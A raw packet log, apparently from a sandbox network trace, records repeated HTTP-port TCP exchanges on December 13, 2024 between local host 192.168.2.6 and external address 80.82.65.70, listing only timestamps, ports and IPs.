                                              Dec 13, 2024 10:48:43.184402943 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.184509039 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.188715935 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.188819885 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.188832045 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.188872099 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.193069935 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.193131924 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.193175077 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.193412066 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.197494030 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.197545052 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.197565079 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.197921038 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.201925039 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.201982021 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.202018023 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.202063084 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.206305981 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.206366062 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.206397057 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.206450939 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.210757971 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.210814953 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.210839033 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.210894108 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.215085030 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.215147972 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.215198040 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.215245962 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.219536066 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.219605923 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.219624043 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.219759941 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.223912001 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.223972082 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.223994017 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.224050999 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.228368044 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.228388071 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.228450060 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.250017881 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:43.369762897 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.736414909 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:43.736495972 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:45.778191090 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:45.898502111 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:46.273844004 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:46.273915052 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:48.339608908 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:48.459830999 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:48.834713936 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:48.834783077 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:50.886564016 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:51.006702900 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:51.369728088 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:51.369824886 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.402832031 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.714023113 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:53.803149939 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.833935022 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.891000032 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:53.891177893 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:55.964778900 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:56.084556103 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:56.470319986 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:56.473858118 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:58.496692896 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:48:58.619424105 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:58.998207092 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:48:58.998300076 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:01.028338909 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:01.148369074 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:01.519903898 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:01.520004988 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:03.652170897 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:03.773050070 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:04.136853933 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:04.140031099 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:06.324368000 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:06.444185019 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:06.817585945 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:06.821842909 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:08.980671883 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:09.100465059 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:09.481319904 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:09.481414080 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.573945999 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.574284077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.693960905 CET804976180.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:12.693994045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:12.694058895 CET4976180192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.694135904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.694344044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:12.814032078 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179785967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179826021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179838896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179899931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.179899931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.179971933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179985046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.179996967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180010080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180025101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180041075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180075884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180169106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180191040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180203915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.180212975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180257082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.180257082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.299777031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.299843073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.299866915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.299937963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.303997040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.304061890 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.371535063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.371599913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.371601105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.371635914 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.375737906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.376063108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.376121044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.384147882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.384215117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.384227991 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.384260893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.392143965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.392205000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.392265081 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.392307043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.400530100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.400595903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.400651932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.400772095 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.408919096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.409007072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.409061909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.409101963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.417390108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.417438984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.417587042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.417640924 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.425729036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.425789118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.425823927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.425982952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.434109926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.434197903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.434207916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.434236050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.442643881 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.442698002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.442711115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.442739010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.450257063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.450318098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.450337887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.450378895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.491465092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.491532087 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.491569042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.491664886 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.563570023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.563649893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.563663006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.563708067 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.565912008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.565962076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.566051006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.566095114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.570600033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.570736885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.570760965 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.570780039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.575370073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.575447083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.575501919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.575546980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.580044985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.580059052 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.580115080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.584698915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.584808111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.584816933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.584968090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.589390039 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.589485884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.589509010 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.589548111 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.594010115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.594068050 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.594140053 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.594218016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.598678112 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.598756075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.598861933 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.598907948 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.603390932 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.603457928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.603534937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.603585958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.608025074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.608154058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.608165026 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.608386040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.612652063 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.612701893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.612720013 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.612757921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.617337942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.617408037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.617434025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.617448092 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.621989965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.622045994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.622153997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.622194052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.625673056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.625752926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.625775099 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.625817060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.629324913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.629400969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.629407883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.629445076 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.632937908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.632987976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.632991076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.633027077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.636631012 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.636698961 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.636713028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.636754990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.640276909 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.640322924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.640367031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.640377998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.643872976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.643944025 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.755747080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.755805969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.755834103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.755872011 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.757133007 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.757181883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.757251024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.757293940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.760072947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.760138988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.760186911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.760363102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.762890100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.763016939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.763045073 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.763060093 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.765778065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.765800953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.765842915 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.765866041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.768608093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.768659115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.768701077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.768747091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.771330118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.771404028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.771426916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.771470070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.774089098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.774144888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.774173021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.774210930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.776808023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.776856899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.776938915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.776982069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.779556990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.779661894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.779679060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.779707909 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.782254934 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.782311916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.782392979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.782430887 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.785017967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.785099983 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.785121918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.785157919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.787739038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.787782907 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.787795067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.787842989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.790484905 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.790530920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.790606976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.790661097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.793209076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.793277979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.793459892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.793503046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.796010971 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.796083927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.796106100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.796125889 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.798683882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.798738003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.798825026 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.798885107 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.801409960 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.801455975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.801498890 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.801604033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.804161072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.804213047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.804254055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.804388046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.806916952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.806972027 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.807008028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.807073116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.809715986 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.809804916 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.809828997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.809910059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.812365055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.812443972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.812486887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.812530041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.815217018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.815257072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.815357924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.815460920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.817827940 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.817933083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.817960978 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.817974091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.820559978 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.820622921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.820652008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.820693970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.823338032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.823395967 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.823501110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.823501110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.826112032 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.826195002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.826265097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.826344967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.828821898 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.828862906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.828887939 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.829005003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:14.831614017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:14.831667900 CET4985880192.168.2.680.82.65.70
